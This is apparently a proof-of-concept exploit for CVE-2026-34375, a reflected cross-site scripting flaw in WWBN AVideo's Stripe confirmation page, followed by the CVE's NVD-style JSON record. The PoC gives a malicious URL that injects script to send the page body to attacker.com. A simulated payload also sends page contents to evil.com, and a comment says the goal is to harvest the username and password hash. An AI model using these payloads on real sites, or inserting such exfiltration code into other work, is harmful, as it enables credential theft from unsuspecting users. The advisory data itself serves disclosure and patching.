CVE-2026-34375

<!-- PoC for CVE-2026-34375 Target: WWBN AVideo <= 26.0 Parameter: plugin Usage: Access the vulnerable URL with the payload below. --> <!-- Malicious URL construction --> <!-- https://target.com/avideo/plugin/YPTWallet/confirmStripe.php?plugin=%3C/script%3E%3Cscript%3Efetch('https://attacker.com/steal?c='+encodeURIComponent(btoa(document.body.innerHTML)))%3C/script%3E --> <!-- Payload Explanation --> <!-- The payload closes the existing script block and starts a new one to execute arbitrary JS. --> <script> // Simulating the vulnerable code behavior var pluginParam = "</script><script>alert('CVE-2026-34375 Exploited!'); console.log('Stealing credentials...'); var x = new XMLHttpRequest(); x.open('GET', 'http://evil.com/log?data='+document.body.innerHTML); x.send();</script>"; // In a real attack, the injected script would parse the DOM to find the username and password hash // output by User::getUserName() and User::getUserPass(). </script>

{"cve": {"id": "CVE-2026-34375", "sourceIdentifier": "[email protected]", "published": "2026-03-27T19:16:43.107", "lastModified": "2026-03-31T18:48:56.307", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "WWBN AVideo is an open source video platform. In versions up to and including 26.0, the YPTWallet Stripe payment confirmation page directly echoes the `$_REQUEST['plugin']` parameter into a JavaScript block without any encoding or sanitization. The `plugin` parameter is not included in any of the framework's input filter lists defined in `security.php`, so it passes through completely raw. An attacker can inject arbitrary JavaScript by crafting a malicious URL and sending it to a victim user. The same script block also outputs the current user's username and password hash via `User::getUserName()` and `User::getUserPass()`, meaning a successful XSS exploitation can immediately exfiltrate these credentials. Commit fa0bc102493a15d79fe03f86c07ab7ca1b5b63e2 fixes the issue."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 4.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wwbn:avideo:*:*:*:*:*:*:*:*", "versionEndIncluding": "26.0", "matchCriteriaId": "774C24F1-9D26-484F-B931-1DA107C8F588"}]}]}], "references": [{"url": "https://github.com/WWBN/AVideo/commit/fa0bc102493a15d79fe03f86c07ab7ca1b5b63e2", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-pm37-62g7-p768", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}